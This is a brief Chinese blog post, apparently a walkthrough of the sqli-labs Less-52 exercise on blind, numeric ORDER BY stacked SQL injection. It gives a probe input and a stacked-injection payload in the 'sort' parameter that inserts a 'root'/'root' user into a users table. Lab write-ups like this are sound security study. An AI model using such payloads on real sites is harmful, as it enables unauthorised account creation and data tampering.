Less(52) GET -Blind based -Order By Clause -numeric -Stacked injection(GET型基于盲注的整型Order By从句堆叠注入)

1.出错别关闭了

  ?sort=1'

  

 

 

2.报错信息不会在前台显示,我们采用 stacked injection 方法 :?sort=1;insert into users(id,username,password) value (20,'root','root')       

      

3.也可以用盲注

原文链接:https://www.cnblogs.com/omnis/p/8392574.html

posted @ 2020-03-24 09:44  孟雨  阅读(107)  评论(0编辑  收藏  举报